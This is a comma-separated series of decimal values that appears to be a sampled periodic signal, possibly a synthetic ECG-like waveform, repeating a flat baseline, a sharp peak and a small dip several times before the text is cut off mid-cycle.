-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 